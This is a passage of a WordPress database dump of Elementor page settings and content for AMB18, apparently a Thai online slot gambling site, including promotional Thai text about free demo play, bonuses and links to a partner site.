เลท\";s:9:\"site_logo\";a:5:{s:3:\"url\";s:78:\"https://amb18b.com/wp-content/uploads/2026/02/cropped-AMB18-logo-scaled-1.webp\";s:2:\"id\";i:366;s:4:\"size\";s:0:\"\";s:3:\"alt\";s:0:\"\";s:6:\"source\";s:7:\"library\";}}'),(54,7,'_elementor_data','[]'),(55,19,'_elementor_edit_mode','builder'),(56,19,'_elementor_template_type','kit'),(58,19,'_wp_page_template','default'),(59,19,'_elementor_page_settings','a:17:{s:13:\"system_colors\";a:4:{i:0;a:3:{s:3:\"_id\";s:7:\"primary\";s:5:\"title\";s:7:\"Primary\";s:5:\"color\";s:7:\"#6EC1E4\";}i:1;a:3:{s:3:\"_id\";s:9:\"secondary\";s:5:\"title\";s:9:\"Secondary\";s:5:\"color\";s:7:\"#54595F\";}i:2;a:3:{s:3:\"_id\";s:4:\"text\";s:5:\"title\";s:4:\"Text\";s:5:\"color\";s:7:\"#7A7A7A\";}i:3;a:3:{s:3:\"_id\";s:6:\"accent\";s:5:\"title\";s:6:\"Accent\";s:5:\"color\";s:7:\"#61CE70\";}}s:13:\"custom_colors\";a:0:{}s:17:\"system_typography\";a:4:{i:0;a:5:{s:3:\"_id\";s:7:\"primary\";s:5:\"title\";s:7:\"Primary\";s:21:\"typography_typography\";s:6:\"custom\";s:22:\"typography_font_family\";s:6:\"Roboto\";s:22:\"typography_font_weight\";s:3:\"600\";}i:1;a:5:{s:3:\"_id\";s:9:\"secondary\";s:5:\"title\";s:9:\"Secondary\";s:21:\"typography_typography\";s:6:\"custom\";s:22:\"typography_font_family\";s:11:\"Roboto Slab\";s:22:\"typography_font_weight\";s:3:\"400\";}i:2;a:5:{s:3:\"_id\";s:4:\"text\";s:5:\"title\";s:4:\"Text\";s:21:\"typography_typography\";s:6:\"custom\";s:22:\"typography_font_family\";s:6:\"Roboto\";s:22:\"typography_font_weight\";s:3:\"400\";}i:3;a:5:{s:3:\"_id\";s:6:\"accent\";s:5:\"title\";s:6:\"Accent\";s:21:\"typography_typography\";s:6:\"custom\";s:22:\"typography_font_family\";s:6:\"Roboto\";s:22:\"typography_font_weight\";s:3:\"500\";}}s:17:\"custom_typography\";a:0:{}s:21:\"default_generic_fonts\";s:10:\"Sans-serif\";s:9:\"site_name\";s:17:\"WordPress Website\";s:19:\"page_title_selector\";s:14:\"h1.entry-title\";s:25:\"hello_header_logo_display\";s:0:\"\";s:28:\"hello_header_tagline_display\";s:0:\"\";s:25:\"hello_header_menu_display\";s:0:\"\";s:25:\"hello_footer_logo_display\";s:0:\"\";s:28:\"hello_footer_tagline_display\";s:0:\"\";s:25:\"hello_footer_menu_display\";s:0:\"\";s:30:\"hello_footer_copyright_display\";s:0:\"\";s:27:\"hello_footer_copyright_text\";s:19:\"All rights reserved\";s:11:\"viewport_md\";i:768;s:11:\"viewport_lg\";i:1025;}'),(60,19,'_elementor_data','[]'),(62,7,'_elementor_version','3.35.5'),(63,7,'_elementor_pro_version','3.32.3'),(65,20,'_elementor_edit_mode','builder'),(66,20,'_elementor_template_type','kit'),(67,20,'_wp_page_template','default'),(68,20,'_elementor_page_settings','a:21:{s:13:\"system_colors\";a:4:{i:0;a:3:{s:3:\"_id\";s:7:\"primary\";s:5:\"title\";s:7:\"Primary\";s:5:\"color\";s:7:\"#A50808\";}i:1;a:3:{s:3:\"_id\";s:9:\"secondary\";s:5:\"title\";s:9:\"Secondary\";s:5:\"color\";s:7:\"#A50808\";}i:2;a:3:{s:3:\"_id\";s:4:\"text\";s:5:\"title\";s:4:\"Text\";s:5:\"color\";s:7:\"#FFFFFF\";}i:3;a:3:{s:3:\"_id\";s:6:\"accent\";s:5:\"title\";s:6:\"Accent\";s:5:\"color\";s:7:\"#A50808\";}}s:13:\"custom_colors\";a:0:{}s:17:\"system_typography\";a:4:{i:0;a:5:{s:3:\"_id\";s:7:\"primary\";s:5:\"title\";s:7:\"Primary\";s:21:\"typography_typography\";s:6:\"custom\";s:22:\"typography_font_family\";s:6:\"Roboto\";s:22:\"typography_font_weight\";s:3:\"600\";}i:1;a:5:{s:3:\"_id\";s:9:\"secondary\";s:5:\"title\";s:9:\"Secondary\";s:21:\"typography_typography\";s:6:\"custom\";s:22:\"typography_font_family\";s:11:\"Roboto Slab\";s:22:\"typography_font_weight\";s:3:\"400\";}i:2;a:5:{s:3:\"_id\";s:4:\"text\";s:5:\"title\";s:4:\"Text\";s:21:\"typography_typography\";s:6:\"custom\";s:22:\"typography_font_family\";s:6:\"Roboto\";s:22:\"typography_font_weight\";s:3:\"400\";}i:3;a:5:{s:3:\"_id\";s:6:\"accent\";s:5:\"title\";s:6:\"Accent\";s:21:\"typography_typography\";s:6:\"custom\";s:22:\"typography_font_family\";s:6:\"Roboto\";s:22:\"typography_font_weight\";s:3:\"500\";}}s:17:\"custom_typography\";a:0:{}s:21:\"default_generic_fonts\";s:10:\"Sans-serif\";s:9:\"site_name\";s:17:\"WordPress Website\";s:19:\"page_title_selector\";s:14:\"h1.entry-title\";s:25:\"hello_header_logo_display\";s:0:\"\";s:28:\"hello_header_tagline_display\";s:0:\"\";s:25:\"hello_header_menu_display\";s:0:\"\";s:25:\"hello_footer_logo_display\";s:0:\"\";s:28:\"hello_footer_tagline_display\";s:0:\"\";s:25:\"hello_footer_menu_display\";s:0:\"\";s:30:\"hello_footer_copyright_display\";s:0:\"\";s:27:\"hello_footer_copyright_text\";s:19:\"All rights reserved\";s:11:\"viewport_md\";i:768;s:11:\"viewport_lg\";i:1025;s:32:\"colors_enable_styleguide_preview\";s:3:\"yes\";s:26:\"body_background_background\";s:7:\"classic\";s:21:\"body_background_color\";s:9:\"#0A0606FA\";s:15:\"activeItemIndex\";i:1;}'),(69,20,'_elementor_data','[]'),(70,20,'_elementor_version','3.32.5'),(71,20,'_elementor_pro_version','3.32.3'),(73,21,'_elementor_edit_mode','builder'),(74,21,'_elementor_template_type','kit'),(75,21,'_wp_page_template','default'),(76,21,'_elementor_page_settings','a:22:{s:13:\"system_colors\";a:4:{i:0;a:3:{s:3:\"_id\";s:7:\"primary\";s:5:\"title\";s:7:\"Primary\";s:5:\"color\";s:7:\"#A50808\";}i:1;a:3:{s:3:\"_id\";s:9:\"secondary\";s:5:\"title\";s:9:\"Secondary\";s:5:\"color\";s:7:\"#A50808\";}i:2;a:3:{s:3:\"_id\";s:4:\"text\";s:5:\"title\";s:4:\"Text\";s:5:\"color\";s:7:\"#FFFFFF\";}i:3;a:3:{s:3:\"_id\";s:6:\"accent\";s:5:\"title\";s:6:\"Accent\";s:5:\"color\";s:7:\"#A50808\";}}s:13:\"custom_colors\";a:0:{}s:17:\"system_typography\";a:4:{i:0;a:5:{s:3:\"_id\";s:7:\"primary\";s:5:\"title\";s:7:\"Primary\";s:21:\"typography_typography\";s:6:\"custom\";s:22:\"typography_font_family\";s:6:\"Roboto\";s:22:\"typography_font_weight\";s:3:\"600\";}i:1;a:5:{s:3:\"_id\";s:9:\"secondary\";s:5:\"title\";s:9:\"Secondary\";s:21:\"typography_typography\";s:6:\"custom\";s:22:\"typography_font_family\";s:11:\"Roboto Slab\";s:22:\"typography_font_weight\";s:3:\"400\";}i:2;a:5:{s:3:\"_id\";s:4:\"text\";s:5:\"title\";s:4:\"Text\";s:21:\"typography_typography\";s:6:\"custom\";s:22:\"typography_font_family\";s:6:\"Roboto\";s:22:\"typography_font_weight\";s:3:\"400\";}i:3;a:5:{s:3:\"_id\";s:6:\"accent\";s:5:\"title\";s:6:\"Accent\";s:21:\"typography_typography\";s:6:\"custom\";s:22:\"typography_font_family\";s:6:\"Roboto\";s:22:\"typography_font_weight\";s:3:\"500\";}}s:17:\"custom_typography\";a:0:{}s:21:\"default_generic_fonts\";s:10:\"Sans-serif\";s:9:\"site_name\";s:17:\"WordPress Website\";s:19:\"page_title_selector\";s:14:\"h1.entry-title\";s:25:\"hello_header_logo_display\";s:0:\"\";s:28:\"hello_header_tagline_display\";s:0:\"\";s:25:\"hello_header_menu_display\";s:0:\"\";s:25:\"hello_footer_logo_display\";s:0:\"\";s:28:\"hello_footer_tagline_display\";s:0:\"\";s:25:\"hello_footer_menu_display\";s:0:\"\";s:30:\"hello_footer_copyright_display\";s:0:\"\";s:27:\"hello_footer_copyright_text\";s:19:\"All rights reserved\";s:11:\"viewport_md\";i:768;s:11:\"viewport_lg\";i:1025;s:32:\"colors_enable_styleguide_preview\";s:3:\"yes\";s:36:\"typography_enable_styleguide_preview\";s:3:\"yes\";s:26:\"body_background_background\";s:7:\"classic\";s:21:\"body_background_color\";s:9:\"#0A0606FA\";s:15:\"activeItemIndex\";i:1;}'),(77,21,'_elementor_data','[]'),(78,21,'_elementor_version','3.32.5'),(79,21,'_elementor_pro_version','3.32.3'),(81,22,'_elementor_edit_mode','builder'),(82,22,'_elementor_template_type','kit'),(83,22,'_wp_page_template','default'),(84,22,'_elementor_page_settings','a:22:{s:13:\"system_colors\";a:4:{i:0;a:3:{s:3:\"_id\";s:7:\"primary\";s:5:\"title\";s:7:\"Primary\";s:5:\"color\";s:7:\"#A50808\";}i:1;a:3:{s:3:\"_id\";s:9:\"secondary\";s:5:\"title\";s:9:\"Secondary\";s:5:\"color\";s:7:\"#A50808\";}i:2;a:3:{s:3:\"_id\";s:4:\"text\";s:5:\"title\";s:4:\"Text\";s:5:\"color\";s:7:\"#FFFFFF\";}i:3;a:3:{s:3:\"_id\";s:6:\"accent\";s:5:\"title\";s:6:\"Accent\";s:5:\"color\";s:7:\"#A50808\";}}s:13:\"custom_colors\";a:0:{}s:17:\"system_typography\";a:4:{i:0;a:5:{s:3:\"_id\";s:7:\"primary\";s:5:\"title\";s:7:\"Primary\";s:21:\"typography_typography\";s:6:\"custom\";s:22:\"typography_font_family\";s:6:\"Prompt\";s:22:\"typography_font_weight\";s:3:\"600\";}i:1;a:5:{s:3:\"_id\";s:9:\"secondary\";s:5:\"title\";s:9:\"Secondary\";s:21:\"typography_typography\";s:6:\"custom\";s:22:\"typography_font_family\";s:6:\"Prompt\";s:22:\"typography_font_weight\";s:3:\"400\";}i:2;a:5:{s:3:\"_id\";s:4:\"text\";s:5:\"title\";s:4:\"Text\";s:21:\"typography_typography\";s:6:\"custom\";s:22:\"typography_font_family\";s:6:\"Prompt\";s:22:\"typography_font_weight\";s:3:\"400\";}i:3;a:5:{s:3:\"_id\";s:6:\"accent\";s:5:\"title\";s:6:\"Accent\";s:21:\"typography_typography\";s:6:\"custom\";s:22:\"typography_font_family\";s:6:\"Prompt\";s:22:\"typography_font_weight\";s:3:\"500\";}}s:17:\"custom_typography\";a:0:{}s:21:\"default_generic_fonts\";s:10:\"Sans-serif\";s:9:\"site_name\";s:17:\"WordPress Website\";s:19:\"page_title_selector\";s:14:\"h1.entry-title\";s:25:\"hello_header_logo_display\";s:0:\"\";s:28:\"hello_header_tagline_display\";s:0:\"\";s:25:\"hello_header_menu_display\";s:0:\"\";s:25:\"hello_footer_logo_display\";s:0:\"\";s:28:\"hello_footer_tagline_display\";s:0:\"\";s:25:\"hello_footer_menu_display\";s:0:\"\";s:30:\"hello_footer_copyright_display\";s:0:\"\";s:27:\"hello_footer_copyright_text\";s:19:\"All rights reserved\";s:11:\"viewport_md\";i:768;s:11:\"viewport_lg\";i:1025;s:32:\"colors_enable_styleguide_preview\";s:3:\"yes\";s:36:\"typography_enable_styleguide_preview\";s:3:\"yes\";s:26:\"body_background_background\";s:7:\"classic\";s:21:\"body_background_color\";s:9:\"#0A0606FA\";s:15:\"activeItemIndex\";i:1;}'),(85,22,'_elementor_data','[]'),(86,22,'_elementor_version','3.32.5'),(87,22,'_elementor_pro_version','3.32.3'),(89,23,'_elementor_edit_mode','builder'),(90,23,'_elementor_template_type','kit'),(91,23,'_wp_page_template','default'),(92,23,'_elementor_page_settings','a:48:{s:13:\"system_colors\";a:4:{i:0;a:3:{s:3:\"_id\";s:7:\"primary\";s:5:\"title\";s:7:\"Primary\";s:5:\"color\";s:7:\"#A50808\";}i:1;a:3:{s:3:\"_id\";s:9:\"secondary\";s:5:\"title\";s:9:\"Secondary\";s:5:\"color\";s:7:\"#A50808\";}i:2;a:3:{s:3:\"_id\";s:4:\"text\";s:5:\"title\";s:4:\"Text\";s:5:\"color\";s:7:\"#FFFFFF\";}i:3;a:3:{s:3:\"_id\";s:6:\"accent\";s:5:\"title\";s:6:\"Accent\";s:5:\"color\";s:7:\"#A50808\";}}s:13:\"custom_colors\";a:0:{}s:17:\"system_typography\";a:4:{i:0;a:5:{s:3:\"_id\";s:7:\"primary\";s:5:\"title\";s:7:\"Primary\";s:21:\"typography_typography\";s:6:\"custom\";s:22:\"typography_font_family\";s:6:\"Prompt\";s:22:\"typography_font_weight\";s:3:\"600\";}i:1;a:5:{s:3:\"_id\";s:9:\"secondary\";s:5:\"title\";s:9:\"Secondary\";s:21:\"typography_typography\";s:6:\"custom\";s:22:\"typography_font_family\";s:6:\"Prompt\";s:22:\"typography_font_weight\";s:3:\"400\";}i:2;a:5:{s:3:\"_id\";s:4:\"text\";s:5:\"title\";s:4:\"Text\";s:21:\"typography_typography\";s:6:\"custom\";s:22:\"typography_font_family\";s:6:\"Prompt\";s:22:\"typography_font_weight\";s:3:\"400\";}i:3;a:5:{s:3:\"_id\";s:6:\"accent\";s:5:\"title\";s:6:\"Accent\";s:21:\"typography_typography\";s:6:\"custom\";s:22:\"typography_font_family\";s:6:\"Prompt\";s:22:\"typography_font_weight\";s:3:\"500\";}}s:17:\"custom_typography\";a:0:{}s:21:\"default_generic_fonts\";s:10:\"Sans-serif\";s:9:\"site_name\";s:17:\"WordPress Website\";s:19:\"page_title_selector\";s:14:\"h1.entry-title\";s:25:\"hello_header_logo_display\";s:0:\"\";s:28:\"hello_header_tagline_display\";s:0:\"\";s:25:\"hello_header_menu_display\";s:0:\"\";s:25:\"hello_footer_logo_display\";s:0:\"\";s:28:\"hello_footer_tagline_display\";s:0:\"\";s:25:\"hello_footer_menu_display\";s:0:\"\";s:30:\"hello_footer_copyright_display\";s:0:\"\";s:27:\"hello_footer_copyright_text\";s:19:\"All rights reserved\";s:11:\"viewport_md\";i:768;s:11:\"viewport_lg\";i:1025;s:32:\"colors_enable_styleguide_preview\";s:3:\"yes\";s:36:\"typography_enable_styleguide_preview\";s:3:\"yes\";s:10:\"body_color\";s:7:\"#FFFFFF\";s:26:\"body_typography_typography\";s:6:\"custom\";s:27:\"body_typography_font_family\";s:6:\"Prompt\";s:25:\"body_typography_font_size\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:16;s:5:\"sizes\";a:0:{}}s:17:\"link_normal_color\";s:7:\"#F5D708\";s:33:\"link_normal_typography_typography\";s:6:\"custom\";s:34:\"link_normal_typography_font_family\";s:6:\"Prompt\";s:32:\"link_normal_typography_font_size\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:16;s:5:\"sizes\";a:0:{}}s:24:\"h1_typography_typography\";s:6:\"custom\";s:25:\"h1_typography_font_family\";s:6:\"Prompt\";s:23:\"h1_typography_font_size\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:29;s:5:\"sizes\";a:0:{}}s:24:\"h2_typography_typography\";s:6:\"custom\";s:25:\"h2_typography_font_family\";s:6:\"Prompt\";s:23:\"h2_typography_font_size\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:26;s:5:\"sizes\";a:0:{}}s:24:\"h3_typography_typography\";s:6:\"custom\";s:25:\"h3_typography_font_family\";s:6:\"Prompt\";s:23:\"h3_typography_font_size\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:24;s:5:\"sizes\";a:0:{}}s:24:\"h4_typography_typography\";s:6:\"custom\";s:25:\"h4_typography_font_family\";s:6:\"Prompt\";s:23:\"h4_typography_font_size\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:18;s:5:\"sizes\";a:0:{}}s:24:\"h5_typography_typography\";s:6:\"custom\";s:25:\"h5_typography_font_family\";s:6:\"Prompt\";s:23:\"h5_typography_font_size\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:17;s:5:\"sizes\";a:0:{}}s:24:\"h6_typography_typography\";s:6:\"custom\";s:25:\"h6_typography_font_family\";s:6:\"Prompt\";s:23:\"h6_typography_font_size\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:16;s:5:\"sizes\";a:0:{}}s:26:\"body_background_background\";s:7:\"classic\";s:21:\"body_background_color\";s:9:\"#0A0606FA\";s:15:\"activeItemIndex\";i:1;}'),(93,23,'_elementor_data','[]'),(94,23,'_elementor_version','3.32.5'),(95,23,'_elementor_pro_version','3.32.3'),(97,24,'_elementor_edit_mode','builder'),(98,24,'_elementor_template_type','wp-page'),(99,24,'_elementor_version','3.32.5'),(100,24,'_elementor_pro_version','3.32.3'),(101,25,'_elementor_edit_mode','builder'),(102,25,'_elementor_template_type','wp-page'),(103,25,'_elementor_version','3.32.5'),(104,25,'_elementor_pro_version','3.32.3'),(105,16,'_wp_page_template','default'),(106,16,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(107,16,'_elementor_data','[{\"id\":\"598df98\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"1de4a1b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"dd4f8a9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Demo-play-slot-Banner-AMB18.webp\",\"id\":354,\"size\":\"\",\"alt\":\"\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/luca333auto.com\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aaa47de\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"2a7956e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"a97ca87\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e1f\\u0e23\\u0e35 \\u0e04\\u0e25\\u0e34\\u0e01!\",\"align\":\"justify\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Prompt\",\"typography_font_weight\":\"800\",\"hover_animation\":\"pulse-shrink\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"motion_fx_tilt_direction\":\"negative\",\"_animation\":\"none\",\"link\":{\"url\":\"https:\\/\\/luca333auto.com\\/\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"button_text_color\":\"#FFFFFF\",\"hover_color\":\"#E6C300\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"d82bac9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"763d481\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\",\"align\":\"justify\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Prompt\",\"typography_font_weight\":\"800\",\"hover_animation\":\"pulse-shrink\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"motion_fx_tilt_direction\":\"negative\",\"_animation\":\"none\",\"link\":{\"url\":\"https:\\/\\/amb18b.com\\/promotion\\/\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"hover_color\":\"#E9C500\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b45af85\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1bdd864\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"6e50ba5\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 AMB18 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e15\\u0e23\\u0e07\\u0e2d\\u0e31\\u0e19\\u0e14\\u0e31\\u0e1a 1 \\u0e23\\u0e27\\u0e21\\u0e40\\u0e01\\u0e21\\u0e41\\u0e15\\u0e01\\u0e44\\u0e27 \",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6f8cc97\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p data-pm-slice=\\\"0 0 []\\\">\\u0e17\\u0e32\\u0e07\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19 AMB18 \\u0e04\\u0e37\\u0e2d\\u0e41\\u0e1e\\u0e25\\u0e15\\u0e1f\\u0e2d\\u0e23\\u0e4c\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2d\\u0e2d\\u0e19\\u0e44\\u0e25\\u0e19\\u0e4c\\u0e2a\\u0e38\\u0e14\\u0e2e\\u0e2d\\u0e15\\u0e17\\u0e35\\u0e48\\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e21\\u0e32\\u0e41\\u0e23\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e2b\\u0e22\\u0e38\\u0e14\\u0e44\\u0e21\\u0e48\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e04\\u0e37\\u0e2d\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e15\\u0e23\\u0e07\\u0e44\\u0e21\\u0e48\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e40\\u0e2d\\u0e40\\u0e22\\u0e48\\u0e19\\u0e15\\u0e4c \\u0e43\\u0e0a\\u0e49 API \\u0e41\\u0e17\\u0e49\\u0e08\\u0e32\\u0e01 USA \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e25\\u0e37\\u0e48\\u0e19 \\u0e40\\u0e2a\\u0e16\\u0e35\\u0e22\\u0e23 \\u0e20\\u0e32\\u0e1e\\u0e04\\u0e21\\u0e0a\\u0e31\\u0e14\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21 \\u0e41\\u0e16\\u0e21\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e41\\u0e15\\u0e01\\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e14\\u0e35 \\u0e42\\u0e14\\u0e19\\u0e43\\u0e08\\u0e2a\\u0e32\\u0e22\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e22\\u0e38\\u0e04\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e2d\\u0e30\\u0e44\\u0e23\\u0e44\\u0e27 \\u0e46 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e23\\u0e2d\\u0e19\\u0e32\\u0e19 \\u0e43\\u0e19\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e23\\u0e27\\u0e21\\u0e40\\u0e01\\u0e21\\u0e15\\u0e31\\u0e27\\u0e17\\u0e47\\u0e2d\\u0e1b\\u0e08\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e04\\u0e48\\u0e32\\u0e22\\u0e14\\u0e31\\u0e07\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e40\\u0e01\\u0e21\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e49\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e16\\u0e37\\u0e2d\\u0e41\\u0e25\\u0e30\\u0e04\\u0e2d\\u0e21\\u0e1e\\u0e34\\u0e27\\u0e40\\u0e15\\u0e2d\\u0e23\\u0e4c \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e48\\u0e44\\u0e2b\\u0e19\\u0e01\\u0e47\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e1a\\u0e32\\u0e22 \\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e22\\u0e39\\u0e2a\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e01\\u0e47\\u0e21\\u0e35\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e1f\\u0e23\\u0e35\\u0e43\\u0e2b\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e17\\u0e38\\u0e01\\u0e27\\u0e31\\u0e19 \\u0e22\\u0e31\\u0e07\\u0e21\\u0e35\\u0e42\\u0e1b\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e1f\\u0e23\\u0e35\\u0e01\\u0e31\\u0e1a\\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15\\u0e04\\u0e37\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e44\\u0e27\\u0e49\\u0e0b\\u0e31\\u0e1e\\u0e1e\\u0e2d\\u0e23\\u0e4c\\u0e15\\u0e2a\\u0e32\\u0e22\\u0e25\\u0e38\\u0e22\\u0e2d\\u0e35\\u0e01\\u0e14\\u0e49\\u0e27\\u0e22\\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e04\\u0e19\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e44\\u0e14\\u0e49\\u0e1b\\u0e23\\u0e30\\u0e2a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e13\\u0e4c\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e19\\u0e38\\u0e01 \\u0e15\\u0e37\\u0e48\\u0e19\\u0e40\\u0e15\\u0e49\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19\\u0e17\\u0e35\\u0e48\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27\\u0e17\\u0e31\\u0e19\\u0e43\\u0e08\\u0e17\\u0e33\\u0e23\\u0e32\\u0e22\\u0e01\\u0e32\\u0e23\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e23\\u0e2d\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e2d\\u0e32\\u0e23\\u0e21\\u0e13\\u0e4c \\u0e17\\u0e31\\u0e49\\u0e07\\u0e19\\u0e35\\u0e49\\u0e04\\u0e27\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e21\\u0e35\\u0e2a\\u0e15\\u0e34\\u0e27\\u0e32\\u0e07\\u0e41\\u0e1c\\u0e19\\u0e01\\u0e32\\u0e23\\u0e40\\u0e07\\u0e34\\u0e19\\u0e43\\u0e2b\\u0e49\\u0e14\\u0e35 \\u0e41\\u0e25\\u0e30\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e17\\u0e35\\u0e48\\u0e21\\u0e35\\u0e2d\\u0e32\\u0e22\\u0e38 18 \\u0e1b\\u0e35\\u0e02\\u0e36\\u0e49\\u0e19\\u0e44\\u0e1b\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19 